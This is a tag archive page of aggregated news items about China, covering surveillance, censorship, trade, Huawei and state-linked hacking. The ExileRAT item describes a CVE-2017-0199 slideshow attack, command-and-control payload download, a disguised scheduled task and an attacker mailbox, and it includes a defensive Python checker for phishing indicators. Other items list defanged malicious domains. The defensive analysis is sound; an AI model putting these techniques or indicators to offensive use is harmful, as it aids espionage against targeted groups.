Category Archives: china

Chinese facial recognition database tracking Muslims left exposed

By Waqas

China is often held responsible for conducting surveillance campaigns and espionage activities discreetly, not only on its citizens but on governments across continents. Now, a misconfigured facial recognition database has emerged that confirms the allegations put forth against China. Reportedly, a Dutch security researcher has exposed a database that contains exclusive details about the deep-rooted surveillance tactics […]

This is a post from HackRead.com Read the original post: Chinese facial recognition database tracking Muslims left exposed

The Internet, Divided Between the US and China, Has Become a Battleground

The global internet is splitting in two. From a report: One side, championed in China, is a digital landscape where mobile payments have replaced cash. Smartphones are the devices that matter, and users can shop, chat, bank and surf the web with one app. The downsides: The government reigns absolute, and it is watching -- you may have to communicate with friends in code. And don't expect to access Google or Facebook. On the other side, in much of the world, the internet is open to all. Users can say what they want, mostly, and web developers can roll out pretty much anything. People accustomed to China's version complain this other internet can seem clunky. You must toggle among apps to chat, shop, bank and surf the web. Some websites still don't seem to be designed with smartphones in mind. The two zones are beginning to clash with the advent of the superfast new generation of mobile technology called 5G. China aims to be the biggest provider of gear underlying the networks, and along with that it is pushing client countries to adopt its approach to the web -- essentially urging some to use versions of the "Great Firewall" that Beijing uses to control its internet and contain the West's influence. Battles are popping up around the world as Chinese tech giants try to use their market power at home to expand abroad, something they've largely failed to do so far. Some Silicon Valley executives worry the divergence risks giving Chinese companies an advantage in new technologies such as artificial intelligence, partly because they face fewer restrictions over privacy and data protection. Further reading: Former Google CEO Eric Schmidt Predicts the Internet Will Split in Two By 2028 -- and One Part Will Be Led By China.

Read more of this story at Slashdot.

The Department of Homeland Security Says Foreign Based VPNs Pose a Threat to National Security

The US and China tensions continue as the Department of Homeland Security (DHS) seeks to tighten their national security against

The Department of Homeland Security Says Foreign Based VPNs Pose a Threat to National Security on Latest Hacking News.

China and India Lead the Way in Greening

hackingbear writes: The world is literally a greener place than it was twenty years ago, and data from NASA satellites has revealed a counterintuitive source for much of this new foliage. A new study shows that China and India -- the world's most populous countries -- are leading the increase in greening on land. The effect comes mostly from ambitious tree-planting programs in China and intensive agriculture in both countries. Ranga Myneni of Boston University and colleagues first detected the greening phenomenon in satellite data from the mid-1990s, but they did not know whether human activity was a chief cause. The research team found that global green leaf area has increased by 5 percent since the early 2000s, an area equivalent to all of the Amazon rainforests. At least 25 percent of that gain came in China. "China and India account for one-third of the greening, but contain only 9 percent of the planet's land area covered in vegetation," said lead author Chi Chen of Boston University. "That is a surprising finding, considering the general notion of land degradation in populous countries from overexploitation." China's outsized contribution to the global greening trend comes in large part from its programs to conserve and expand forests (about 42 percent of the greening contribution). These programs were developed in an effort to reduce the effects of soil erosion, air pollution, and climate change.


3 Things You Need to Know About the Market Today: Xi’s Surprise, US Inflation, Shutdown Saga

1. Chinese President Xi to Join Trade Talks in Beijing

Shanghai Composite Index CFD, 4-Hour Chart Analysis

Global stock markets are higher once again today ahead of the US session, boosted by the continued trade-related optimism. The news that Chinese President Xi will unexpectedly attend the current round of US-Chinese trade talks lifted stocks across […]

The post 3 Things You Need to Know About the Market Today: Xi’s Surprise, US Inflation, Shutdown Saga appeared first on Hacked: Hacking Finance.

Ask Slashdot: Is It Ethical To Purchase Electronics Products Made In China?

dryriver writes: A lot of people seem to think it's O.K. to buy electronics made in China. We get to buy products considerably cheaper than we otherwise would, and China by all accounts is growing, developing, and modernizing as a nation due to all the cool stuff they now make for the world. There is only one problem with that reasoning. 21st Century China has an atrocious human rights record, and almost all human rights watchdogs report that China is becoming more and more repressive each year. Freedom House put it this way in 2018: "It's worth noting that, in its attitude toward political dissent, the Chinese Communist Party has proven much harsher than the old Soviet regime of the Brezhnev era. Modern Chinese sentences are longer, the prospects for early release are far worse, and the Chinese authorities are generally unmoved by pleas for leniency from foreign diplomats." Basically, consumer dollars from around the world are not gradually creating a gentler, freer, more prosperous and more modern China at all. They are making the Chinese Communist Party richer, stronger, bolder and more aggressive and repressive in every respect. To the question: knowing what the human rights situation is in China, and that consumer dollars and euros flowing into the country from abroad is making things worse, not better, is it at all ethical to buy electronics or IT products manufactured in China?


Forcing the Adversary to Pursue Insider Theft

Jack Crook pointed me toward a story by Christopher Burgess about intellectual property theft by "Hongjin Tan, a 35 year old Chinese national and U.S. legal permanent resident... [who] was arrested on December 20 and charged with theft of trade secrets. Tan is alleged to have stolen the trade secrets from his employer, a U.S. petroleum company," according to the criminal complaint filed by the US DoJ.

Tan's former employer and the FBI allege that Tan "downloaded restricted files to a personal thumb drive." I could not tell from the complaint if Tan downloaded the files at work or at home, but the thumb drive ended up at Tan's home. His employer asked Tan to bring it to their office, which Tan did. However, he had deleted all the files from the drive. Tan's employer recovered the files using commercially available forensic software.

This incident, by definition, involves an "insider threat." Tan was an employee who appears to have copied information that was outside the scope of his work responsibilities, resigned from his employer, and was planning to return to China to work for a competitor, having delivered his former employer's intellectual property.

When I started GE-CIRT in 2008 (officially "initial operating capability" on 1 January 2009), one of the strategies we pursued involved insider threats. I've written about insiders on this blog before but I couldn't find a description of the strategy we implemented via GE-CIRT.

We sought to make digital intrusions more expensive than physical intrusions.

In other words, we wanted to make it easier for the adversary to accomplish his mission using insiders. We wanted to make it more difficult for the adversary to accomplish his mission using our network.

In a cynical sense, this makes security someone else's problem. Suddenly the physical security team is dealing with the worst of the worst!

This is a win for everyone, however. Consider the many advantages the physical security team has over the digital security team.

The physical security team can work with human resources during the hiring process. HR can run background checks and identify suspicious job applicants prior to granting employment and access.

Employees are far more exposed than remote intruders. Employees, even under cover, expose their appearance, likely residence, and personalities to the company and its workers.

Employees can be subject to far more intensive monitoring than remote intruders. Employee endpoints can be instrumented. Employee workspaces are instrumented via access cards, cameras at entry and exit points, and other measures.

Employers can cooperate with law enforcement to investigate and prosecute employees. They can control and deter theft and other activities.

In brief, insider theft, like all "close access" activities, is incredibly risky for the adversary. It is a win for everyone when the adversary must resort to using insiders to accomplish their mission. Digital and physical security must cooperate to leverage these advantages, while collaborating with human resources, legal, information technology, and business lines to wring the maximum results from this advantage.

Australia Investigating Digital Attack Attempt against Federal Parliament

Australia’s security agencies have launched an investigation into a digital attack attempt against the country’s Federal Parliament. Sources told the Australian Broadcasting Company that security personnel caught digital attackers in the early stages of breaking into the Federal Parliament’s computer network. It’s unclear whether bad actors stole any information. As a precaution, authorities reset lawmakers’ […]

The post Australia Investigating Digital Attack Attempt against Federal Parliament appeared first on The State of Security.

China Hacked Norway’s Visma To Steal Client Secrets, Investigators Say

A prolific espionage group, which the U.S. government believes is Chinese, compromised billion-dollar business service provider Visma in 2018, according to a report by Recorded Future, a threat intelligence firm. From a report: The attack was part of what Western countries said in December is a global hacking campaign by China's Ministry of State Security to steal intellectual property and corporate secrets, according to Recorded Future. China's Ministry of State Security has no publicly available contacts. The foreign ministry did not respond to a request for comment, but Beijing has repeatedly denied any involvement in cyber-enabled spying. Visma took the decision to talk publicly about the breach to raise industry awareness about the hacking campaign, which is known as Cloudhopper and targets technology service and software providers in order to reach their clients. Cyber security firms and Western governments have warned about Cloudhopper several times since 2017 but have not disclosed the identities of the companies affected.


ExileRAT Malware Targets Tibetan Exile Government

Researchers have discovered a new cyber-espionage campaign targeting the organization representing the exiled Tibetan government.

The post ExileRAT Malware Targets Tibetan Exile Government appeared first on The Security Ledger.


New ExileRAT backdoor used in attacks aimed at users in Tibet

A malware campaign using a new LuckyCat-linked RAT dubbed ExileRAT has been targeting the mailing list of the organization officially representing the Tibetan government-in-exile.

Security experts at Talos group have uncovered a malware campaign using the ExileRAT backdoor to target the mailing list of the organization officially representing the Tibetan government-in-exile.

Threat actors are delivering the malware via a weaponized Microsoft PowerPoint document; the messages are reaching people on a mailing list run by the Central Tibetan Administration (CTA).

ExileRAT campaign

The nature of the malware and the targets suggests the involvement of a nation-state actor carrying out a cyber espionage campaign.

Given the nature of the threat and the targets, the campaign was likely designed for espionage purposes, Talos’ security researchers say. 

The bait PowerPoint document is a copy of a legitimate PDF available on CTA’s website; it was sent by the attackers to all subscribers of the CTA mailing list.

“Cisco Talos recently observed a malware campaign delivering a malicious Microsoft PowerPoint document using a mailing list run by the Central Tibetan Administration (CTA), an organization officially representing the Tibetan government-in-exile.” reads the analysis published by Talos.

“The document used in the attack was a PPSX file, a file format used to deliver a non-editable slideshow derived from a Microsoft PowerPoint document.”

The experts received an email message from the CTA mailing list containing an attachment, “Tibet-was-never-a-part-of-China.ppsx.” The researchers noticed that the standard Reply-To header used by the CTA mailings had been modified to redirect responses to an email address (mediabureauin [at] gmail.com) controlled by the hackers.
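A defender-side check for the two mail-level indicators described above (a Reply-To header that no longer points back at the list, and a slideshow document arriving as an attachment) can be run over a mail archive or a mailing-list moderation queue. The code below is an added example, not part of the Security Affairs or Talos write-ups: the two messages, the list domain `list.example.org` and the `webmail.example.net` reply address are constructed for illustration, and the set of risky extensions is an assumption; the attachment filename is the one reported.

```python
import email
from email import policy
from email.utils import parseaddr

# Assumed domain of the legitimate mailing list (constructed for this example).
LIST_DOMAIN = "list.example.org"

# Constructed sample: a normal list message whose Reply-To stays on the list domain.
LEGIT_MSG = b"""From: CTA News <news@list.example.org>
To: subscribers@list.example.org
Reply-To: news@list.example.org
Subject: Weekly update
Content-Type: text/plain

Hello subscribers.
"""

# Constructed sample: same From, but Reply-To diverted to an outside mailbox
# and a PPSX slideshow attached (filename as reported in the campaign).
SUSPECT_MSG = b"""From: CTA News <news@list.example.org>
To: subscribers@list.example.org
Reply-To: attacker-mailbox@webmail.example.net
Subject: Important document
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

See attached.
--b1
Content-Type: application/vnd.openxmlformats-officedocument.presentationml.slideshow; name="Tibet-was-never-a-part-of-China.ppsx"
Content-Disposition: attachment; filename="Tibet-was-never-a-part-of-China.ppsx"

ZZ
--b1--
"""

# Office and script formats that should not normally arrive on an announcement list
# (assumed policy for this example).
RISKY_EXTENSIONS = {".ppsx", ".pps", ".ppt", ".pptx", ".doc", ".docm", ".rtf", ".hta"}


def domain_of(header_value):
    """Return the lower-cased domain part of an address header, or '' if absent."""
    _, address = parseaddr(str(header_value or ""))
    return address.rpartition("@")[2].lower()


def check_message(raw_bytes, list_domain=LIST_DOMAIN):
    """Return a list of finding strings for one raw RFC 5322 message."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []

    from_domain = domain_of(msg["From"])
    reply_domain = domain_of(msg["Reply-To"])
    # A Reply-To that leaves the list domain silently redirects every reply.
    if reply_domain and reply_domain != list_domain:
        findings.append(f"reply-to-mismatch:{reply_domain}")
    if from_domain != list_domain:
        findings.append(f"from-mismatch:{from_domain}")

    # iter_attachments() yields nothing for single-part messages, so this is safe
    # on plain-text mail as well.
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        ext = "." + name.rpartition(".")[2] if "." in name else ""
        if ext in RISKY_EXTENSIONS:
            findings.append(f"risky-attachment:{name}")
    return findings


if __name__ == "__main__":
    for label, raw in (("legit", LEGIT_MSG), ("suspect", SUSPECT_MSG)):
        print(label, check_message(raw))
```

Because the check compares Reply-To against the list's own domain rather than against From, it still fires when From is spoofed to look identical to the list sender, which is the situation the report describes.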

The weaponized documents exploit the CVE-2017-0199 flaw, a zero-day arbitrary code execution vulnerability fixed by Microsoft in April 2017 that has been actively exploited in attacks in the wild.

The exploit code used by the attackers originated from a public script available on GitHub. The researchers also noticed that the PPSX attempts to contact iplocation to perform some geo-location lookups.

It connects to the command and control (C&C) server to receive a JavaScript script responsible for downloading the final payload. 

The malicious code is executed via WScript while also utilizing cmd.exe to create a scheduled task called “Diagnostic_System_Host,” a name similar to the legitimate system task name “Diagnostic System Host” but with underscores in place of the spaces.

The ExileRAT used in this campaign supports commands to retrieve system information (i.e. computer name, username, drive listing, network adapters and process names), exfiltrate data, and execute or terminate processes.

Talos pointed out that the C2 infrastructure has been used in multiple campaigns, including attacks against Tibetan activists leveraging a newer version of the LuckyCat Android RAT.

“This newer version includes the same features as the 2012 version (file uploading, downloading, information stealing and remote shell) and adds several new features, including file removing, app execution, audio recording, personal contact stealing, SMS stealing, recent call stealing and location stealing.” continues the report.

Experts conclude that this new campaign represents an “evolution in a series of attacks targeting a constituency of political supporters, and further evidence that not all attacks require the use of zero-day vulnerabilities,” Talos says. 

The good news is that attackers leveraged an old issue that could be easily detected by up-to-date defense systems. 

Pierluigi Paganini

(SecurityAffairs – hacking, Exilerat)

The post New ExileRAT backdoor used in attacks aimed at users in Tibet appeared first on Security Affairs.

China Will Attempt 30-Plus Launches in 2019, Including Crucial Long March 5 Missions

New submitter starmanaj shares a report: The main contractor for the Chinese space program is planning more than 30 launches in 2019, with major missions including the crucial return-to-flight of the heavy-lift Long March 5 rocket in July. The China Aerospace Science and Technology Corporation (CASC), announced Jan. 29 that it would aim to loft more than 50 spacecraft on 30-plus launches this year. Among these will be the third launch on the Long March 5, a 5-meter-diameter, 57-meter-tall heavy-lift launch vehicle which failed in its second flight in July 2017, delaying the Chang'e-5 lunar sample return mission and the construction of the Chinese Space Station. The mission will take place in July at the coastal Wenchang Satellite Launch Center on Hainan island, CASC vice president Yang Baohua said at a Jan. 29 news conference in Beijing, which also saw the release of a "Blue Book of China Aerospace Science and Technology Activities."


DoJ Charges Huawei Execs in Broad Indictment Spanning 10 Years of Criminal Activity

The Department of Justice (DoJ) filed broad charges against Chinese telecom giant Huawei Technologies Co. Ltd. and its CFO Wanzhou Meng for allegedly stealing trade secrets from U.S. mobile firm T-Mobile and deceiving U.S. stakeholders about its business activity in Iran, among a number of other fraud and conspiracy activities over a 10-year...



Huawei Is Blocked in US, But Its Chips Power Cameras Everywhere

An anonymous reader shares a report: Pelco, a California-based security camera maker, set lofty sales targets last year for a model with sharper video resolution and other cutting-edge features. That was until Congress derailed its plans. In August, updated legislation barred the U.S. military and government from buying tech gear from firms deemed too close to authorities in China. When the bill surfaced, Pelco scrapped any thought of providing its new GPC Professional 4K camera to the U.S. government and lowered its sales goals. The reason: The device uses parts from HiSilicon, the chip division of Huawei. [...] Most of the focus is on Huawei telecom gear that helps run communications networks all over the world. But chips from the HiSilicon unit are also sparking concern because they power about 60 percent of surveillance cameras. That means Chinese chips process video from cameras that sit in places as varied as pizzerias, offices and banks across the U.S.


A Tiny Screw Shows Why iPhones Won’t Be ‘Assembled in USA’

An anonymous reader shares a report: Despite a trade war between the United States and China and past admonishments from President Trump "to start building their damn computers and things in this country," Apple is unlikely to bring its manufacturing closer to home. A tiny screw illustrates why. [Editor's note: the link may be paywalled; alternative source.] In 2012, Apple's chief executive, Timothy D. Cook, went on prime-time television to announce that Apple would make a Mac computer in the United States. It would be the first Apple product in years to be manufactured by American workers, and the top-of-the-line Mac Pro would come with an unusual inscription: "Assembled in USA." But when Apple began making the $3,000 computer in Austin, Tex., it struggled to find enough screws, according to three people who worked on the project and spoke on the condition of anonymity because of confidentiality agreements. In China, Apple relied on factories that can produce vast quantities of custom screws on short notice. In Texas, where they say everything is bigger, it turned out the screw suppliers were not. Tests of new versions of the computer were hamstrung because a 20-employee machine shop that Apple's manufacturing contractor was relying on could produce at most 1,000 screws a day. The screw shortage was one of several problems that postponed sales of the computer for months, the people who worked on the project said. By the time the computer was ready for mass production, Apple had ordered screws from China.


URLhaus took down over 100,000 malware websites in 10 months

Researchers, organisations and vendors came together under the project, URLhaus, to bring down sites providing malware content. 100,000 sites were

URLhaus took down over 100,000 malware websites in 10 months on Latest Hacking News.

China Creates App To Tell You If You’re Near Someone In Debt, Encourages You To Report Them

The Chinese government has developed a mobile app that tells users if they are near someone who is in debt. The app, called a "map of deadbeat debtors," flashes when the user is within 500 meters of a debtor and displays that person's exact location. TechSpot reports: News of the app has caused quite a bit of controversy after it was originally reported by the state-run China Daily. It is an extension to China's existing "social credit" system which scores people based on how they act in public. The app is available through the WeChat platform which has become immensely popular in China. The government stated that "Deadbeat debtors in North China's Hebei province will find it more difficult to abscond as the Higher People's Court of Hebei on Monday introduced" the app. Once a user is alerted that they are close to a debtor, the user can then view their personal information. This will reveal their name, national ID number, and why they were added to the debtor list. The debtor can then be publicly shamed or reported to the authorities if it is deemed that they are capable of repaying their debts.


The Messy Truth About Infiltrating Computer Supply Chains

In October last year, Bloomberg Businessweek published an alarming story: Operatives working for China's People's Liberation Army had secretly implanted microchips into motherboards made in China and sold by U.S.-based Supermicro. While Bloomberg's story -- which has been challenged by numerous players -- may well be completely (or partly) wrong, the danger of China compromising hardware supply chains is very real, judging from classified intelligence documents, reports The Intercept. From the report: U.S. spy agencies were warned about the threat in stark terms nearly a decade ago and even assessed that China was adept at corrupting the software bundled closest to a computer's hardware at the factory, threatening some of the U.S. government's most sensitive machines, according to documents provided by National Security Agency whistleblower Edward Snowden. The documents also detail how the U.S. and its allies have themselves systematically targeted and subverted tech supply chains, with the NSA conducting its own such operations, including in China, in partnership with the CIA and other intelligence agencies. The documents also disclose supply chain operations by German and French intelligence. What's clear is that supply chain attacks are a well-established, if underappreciated, method of surveillance -- and much work remains to be done to secure computing devices from this type of compromise. "An increasing number of actors are seeking the capability to target ... supply chains and other components of the U.S. information infrastructure," the intelligence community stated in a secret 2009 report. "Intelligence reporting provides only limited information on efforts to compromise supply chains, in large part because we do not have the access or technology in place necessary for reliable detection of such operations."


Caterers in China Are Using AI To Spot Unhygienic Cooks, Report Says

If you've ever harbored doubts about the hygiene of the cooks flipping your burger and frying your fries, you're definitely not the only one. From a report: Thepaper.cn reports that local authorities in eastern China have tapped artificial intelligence (AI) to clamp down on unsanitary cooks in kitchens -- and to reward those who adhere to best practices. According to the report, a camera-based system currently being piloted in the Zhejiang city of Shaoxing automatically recognizes "poor [sanitation] habits" and alerts managers to offending workers via a mobile app. It's reportedly the fruit of a six-year project -- Sunshine Kitchen -- that seeks to bring transparency to food preparation in catering, hotels, school cafeterias, and restaurants.


A Look Into Why Free VPNs Can Cause More Harm Than Good

Intrusion, falsified encryption and lack of transparency are just some of the flaws a user potentially receives with a free

A Look Into Why Free VPNs Can Cause More Harm Than Good on Latest Hacking News.

China Launches An App Which Works Like A Debtor Radar!

Giving apps an absolutely new dimension, China recently launched an app which works like a radar for people who are in debt.

Reportedly this application was developed on the instructions of the Chinese police. The app was created in the Chinese province of Hebei.

The application displays the locations of people in debt whenever the person using the app is within 500 yards of them.

The major inspiration behind the application is the need to report the citizens who spend more than they should.

The application, which goes by the name of “Map of Deadbeat Debtors”, can be accessed via ‘WeChat’ (a social media app).

It's being claimed that the users are instantly alerted via a flash when they stand within 500 meters of a debtor.

The exact location of the debtor is displayed; whether any personal information is shown has not been confirmed yet.

It's an initiative which works towards citizens keeping a lookout for potential debtors, regardless of the seriousness of the debt.

Apparently, owing a debt is considered inappropriate in the culturally rich country of China.

The new reforms in the social credit system of the country are to be held responsible for the idea of the application.

The latest system is just the thing which the country needs and will judge the citizens on the basis of their social behavior.

China Blocks Microsoft’s Bing Search Engine, Despite Offering Censored Results

Update: Microsoft's search engine Bing has been restored in China after being inaccessible in the country for almost two days. According to sources familiar with the matter, Bing was blocked due to an accidental technical error and not due to an attempt at censorship. China has blocked Microsoft-owned search engine Bing, the company confirmed after receiving complaints from users throughout

Microsoft’s Bing Search Engine Goes Offline In China

An anonymous reader quotes a report from France 24: The Microsoft-run search engine Bing was unavailable in mainland China late Wednesday, raising concerns among some social media users that it could be the latest foreign website to be blocked by censors. Attempting to open cn.bing.com results in an error message, though users can still access Bing's international site using a virtual private network (VPN), which allows people to circumvent China's "Great Firewall" of censorship. It is not clear whether or not Bing has joined China's long list of prohibited websites or if its China service is experiencing technical difficulties. On Weibo, China's Twitter-like social media site, people complained about the lack of access, with some speculating that Bing too had been "walled off." Others aired their dissatisfaction about having to use Baidu, China's largest domestic search service. "I can't open Bing, but I don't want to use Baidu -- what to do?" wrote one user. "Bing is actually dead -- is this to force me to use Baidu??" said another, cursing. Update January 24, 00:10 GMT: Microsoft says it is aware that some users are unable to access Bing in China and says it is investigating the matter.


Hebei, a Northern Chinese Province, Unveils an App That Triggers a Notification When You’re Near Someone in Debt

China is gearing up to launch a social credit system in 2020, giving all citizens an identity number that will be linked to a permanent record. Like a financial score, everything from paying back loans to behaviour on public transport will be included. One aspect of this social credit system is a new app in the northern province of Hebei. From a report: According to the state-run newspaper China Daily, the Hebei-based app will alert people if they are within 500 metres of someone in debt. It's like being on Oxford Street and being able to work out everyone around you who is in debt. According to the financial charity, the Money Charity, the average UK household debt (including mortgages) was $76,000, in June last year. That's a lot of notifications.


3 Things You Need to Know About the Market Today

1. Chinese GDP Growth Slows to Multi-Decade Low

Shanghai Composite, 4-Hour Chart Analysis

When even the strongly PR-optimized Chinese economic releases are showing severe weakness, it’s not at all surprising that the local stock market is in a deep bear market, and even the explosive oversold rally on Wall Street combined with the trade optimism […]

The post 3 Things You Need to Know About the Market Today appeared first on Hacked: Hacking Finance.

Chinese Scientist Who Gene-Edited Babies Fired by University

A Chinese scientist who created what he said were the world's first "gene-edited" babies evaded oversight and broke ethical boundaries in a quest for fame and fortune, state media said on Monday, as his former university said he had been fired. From a report: He Jiankui said in November that he used a gene-editing technology known as CRISPR-Cas9 to alter the embryonic genes of twin girls born that month, sparking an international outcry about the ethics and safety of such research. Hundreds of Chinese and international scientists condemned He and said any application of gene editing on human embryos for reproductive purposes was unethical. Chinese authorities also denounced He and issued a temporary halt to research activities involving the editing of human genes. He had "deliberately evaded oversight" with the intent of creating a gene-edited baby "for the purpose of reproduction," according to the initial findings of an investigating team set up by the Health Commission of China in southern Guangdong province, Xinhua news agency reported. [...] The Southern University of Science and Technology (SUSTech) in the city of Shenzhen, said in a statement on its website that He had been fired.


Foxconn cuts 50,000 contract workers early due to weaker iPhone demand

Foxconn, hit by the iPhone sales slowdown, sheds 50,000 contract workers earlier than expected

Foxconn Technology Group, Apple’s biggest iPhone assembler, has cut around 50,000 of its contract jobs since October 2018 at its most important iPhone factory in Zhengzhou, China, reports Nikkei.

Foxconn generally hires thousands of temporary employees throughout the peak season to meet the seasonal demand of newly released iPhone models. The company typically renews workers’ contracts every month from August until January. The company then reduces the influx of temporary employees once the demand decreases. However, this time around, Foxconn has cut many of those contract jobs months earlier than expected. Weaker demand for the iPhone throughout late 2018 is believed to be the reason behind the cut.

While the size of the cuts is not an issue, it is simply significantly sooner than previous years, the report said, citing an industry source familiar with the situation.

“Normally, the contracts of these workers would be renewed every month from August until mid- to late January, when the workforce is traditionally scaled back for the slow iPhone production season,” the source told Nikkei. “It’s quite different this year to ask assembly line workers to leave before the year-end.” This year, those reductions came as much as three months early.

Foxconn isn’t the only Apple supplier making cuts. A similar story has been witnessed at Pegatron, which is Apple’s second largest iPhone assembler.

A source close to the company [Pegatron] said its normal practice was to reduce the 200,000-strong head count by tens of thousands every month until reaching about 100,000, the minimum required for daily operation. “And for [2018], it just happened sooner than in the past because of poor demand.”

The story is no different for smaller suppliers.

One key component supplier based in Shenzhen had asked 4,000 workers to take an extended “vacation” from October to March, a person with knowledge of the situation said. “The company has not actively laid off those workers yet. It will decide whether or not to lay them off after March 1,” the source said.

The iPhone sales slowdown comes at a time when Foxconn is cutting costs by combining its Mac and iPad production lines with those of Dell and Acer. It is looking to cut 100,000 jobs out of a workforce of 1.1 million across its associates and subsidiaries by the end of 2019.

The post Foxconn cuts 50,000 contract workers early due to weaker iPhone demand appeared first on TechWorm.

The Advanced Persistent Threat files: APT10

We’ve heard a lot about Advanced Persistent Threats (APTs) over the past few years. As a refresher, APTs are prolonged, aimed attacks on specific targets with the intention to compromise their systems and gain information from or about that target. While the targets may be anyone or anything—a person, business, or other organization—APTs are often associated with government or military operations, as they tend to be the organizations with the resources necessary to conduct such an attack. Starting with Mandiant’s APT1 report in 2013, there’s been a continuous stream of exposure of nation-state hacking at scale.

Cybersecurity companies have gotten relatively good at observing and analyzing the tools and tactics of nation-state threat actors; they’re less good at placing these actions in sufficient context for defenders to make solid risk assessments. So we’re going to take a look at a few APT groups from a broader perspective and see how they fit into the larger threat landscape.

Today, we’re beginning with APT10. (Note: These groups have a panoply of different names, but for simplicity’s sake, we’re going to borrow Mandiant’s naming conventions for Chinese groups.)

Who is APT10?

First observed in 2009, APT10 is most commonly attributed via open source research to the Chinese Ministry of State Security (MSS). MSS targets typically include, but are not limited to, intelligence targets surrounding trade negotiations, research and development in competition with Chinese commercial entities, and high-value counterintelligence targets overseas. As an example of a trade-negotiation operation, Fidelis Security observed a watering hole attack in February 2017 targeting members of the National Foreign Trade Council, a US trade lobby group.

A commonly-used tool of APT10 is Scanbox, which is a form of malware that can offer insights into their targeting priorities. Scanbox has been observed on assorted industrial sector targets in the US and Japan, but also on Uighur dissidents overseas. While this supports the thesis of APT10 being a government threat group, we caution defenders against associating any one piece of malware exclusively with one group. Countries maintain multiple threat groups, all of whom are fully capable of collaborating and sharing TTPs.

Malware commonly deployed

APT10 is known for deploying the following malware:

Note: Variants of PlugX and Poison Ivy were developed and deployed by Chinese state-sponsored actors. They have since been sold and resold to individual threat actors across multiple nations. At time of writing, it is inappropriate to attribute an attack to Chinese threat actors based on PlugX or Poison Ivy deployment alone.

Should you be worried?

That depends on the type of organization you run. APT10 has been observed to most commonly target construction, engineering, aerospace, and regional telecoms, as well as traditional government targets. If your company exists outside these verticals, it’s unlikely that APT10 would expend the time and resources to target you. For companies outside the targeting profile, it’s much more cost effective to spend defense budgets on common vulnerabilities that are most leveraged by common attackers.

What might they do next?

Like most APTs, APT10 has traditionally targeted at scale when attacking commercial enterprises. However, a more recent report by PwC and BAE Systems suggests that they have begun devoting a portion of their operations to targeting Managed Service Providers (MSPs), most likely in an attempt to exfiltrate sensitive client data: an MSP’s remote-management access reaches many client networks at once. Given the increasing awareness of advanced threats among high-value targets, continuing to target MSPs in this way is a plausible means of obtaining the same data at a lower cost.

Further resources

If you’d like to do some additional reading on APTs, and specifically APT10, take a look at the following resources:

The post The Advanced Persistent Threat files: APT10 appeared first on Malwarebytes Labs.

Marriott breach included 5 million unencrypted passport numbers

Marriott has good news and bad news for travelers who have passed through its hotels. The good news is that the data breach disclosed back in November, which was originally believed to have exposed the data of more than 500 million people, affected fewer travelers than originally reported (though it didn't specify how many). The bad news is that the data lifted from the company included millions of people's passport numbers.

Via: Wall Street Journal

Source: Marriott

DOJ charges two Chinese nationals with ‘extensive’ hacking campaign

Today, the Department of Justice announced charges against Zhu Hua and Zhang Shilong, two Chinese nationals who engaged in an extensive hacking campaign against the US and other countries. First reported by CNBC, the campaign was allegedly successful at infiltrating at least 45 US and global technology companies and government agencies, and these actions were taken at the behest of the Chinese government. Incredibly, the hackers have been operating since 2006 through this year, according to the DOJ. This comes a week after the NSA warned it had evidence of China preparing for "high-profile" cyber-attacks.

Source: Department of Justice

Historical OSINT – Chinese Government Sites Serving Malware

It's 2008 and I'm stumbling upon yet another decent portfolio of compromised malware-serving Chinese government Web sites. In this post I'll discuss in-depth the campaign and provide actionable intelligence on the infrastructure behind it.

Compromised Chinese government Web site: hxxp://nynews.gov.cn

Sample malicious domains known to have participated in the campaign: hxxp://game1983.com/

Chinese hackers reportedly hit Navy contractors with multiple attacks

Chinese hackers have been targeting US Navy contractors, and were reportedly successful on several occasions over the last 18 months. The infiltrators stole information including missile plans and ship maintenance data, according to a Wall Street Journal report that cites officials and security experts.

Source: Wall Street Journal

US government accuses Chinese hackers of stealing jet engine IP

The Justice Department has charged ten Chinese nationals -- two of whom are intelligence officers -- with hacking into and stealing intellectual property from a pair of unnamed US and French companies from January 2015 to at least May 2015. The hackers were after a type of turbofan engine used on large commercial airliners, either to avoid the cost of developing one or to avoid having to buy it. According to the Department of Justice complaint, a Chinese aerospace manufacturer was simultaneously working on a comparable engine. The intrusions hit aerospace companies located in Arizona, Massachusetts and Oregon.

Via: ZD Net

Source: US Department of Justice

US intelligence chief says ‘no evidence’ of Chinese spy chips

Dan Coats, the US director of national intelligence, said there's "no evidence" that Chinese spies tampered with servers bought by up to 30 companies, including the likes of Apple and a telecom provider, as Bloomberg reported earlier this month. However, he told Cyberscoop that "we're not taking anything for granted. We haven't seen anything, but we're always watching."

Via: The Verge

Source: Cyberscoop

Apple CEO calls on Bloomberg to retract China surveillance report

Earlier this month, Bloomberg reported that tiny surveillance chips had been implanted, during manufacturing in China, in server motherboards from San Jose-based Super Micro, reaching the data center hardware of up to 30 companies, including Amazon and Apple. These chips were supposedly used to steal intellectual property. However, all companies named in the initial report have denied Bloomberg's claims. Now, Apple CEO Tim Cook is calling on the well-reputed publication to retract its story altogether, according to BuzzFeed News.

Source: BuzzFeed News

China Publishes the Draft Regulations on the Classified Protection of Cybersecurity

On June 27, 2018, the Ministry of Public Security of the People’s Republic of China published the Draft Regulations on the Classified Protection of Cybersecurity (网络安全等级保护条例(征求意见稿)) (“Draft Regulation”) and is seeking comments from the public by July 27, 2018.

Pursuant to Article 21 of the Cybersecurity Law, the Draft Regulation establishes the classified protection of cybersecurity. The classified protection of information security scheme was previously implemented under the Administrative Measures for the Classified Protection of Information Security. The Draft Regulation extends the targets of security protection from computer systems alone to anything related to the construction, operation, maintenance and use of networks, such as cloud computing, big data, artificial intelligence, Internet of Things, industrial control systems and mobile Internet, except those set up by individuals and families for personal use.

The obligations of network operators include, but are not limited to, (1) grade confirmation and filing; (2) security construction and ratification; (3) grade assessment; (4) self-inspection; (5) protection of network infrastructure, network operation, and data and information; (6) effective handling of cybersecurity incidents; and (7) guarding against network crimes, all of which vary according to the classified level at which the network operator is graded.

Network Operator Compliance

  • Classified Levels. The network operator must ascertain its security level in the planning and design phase. The network is classified by five levels for the degree of security protection as shown below.

Explanation of terms such as “object” and “degree of injury” can be found in Draft Information Security Technology-Guidelines for Grading of Classified Cybersecurity Protection, which closed for public comment on March 5, 2018.

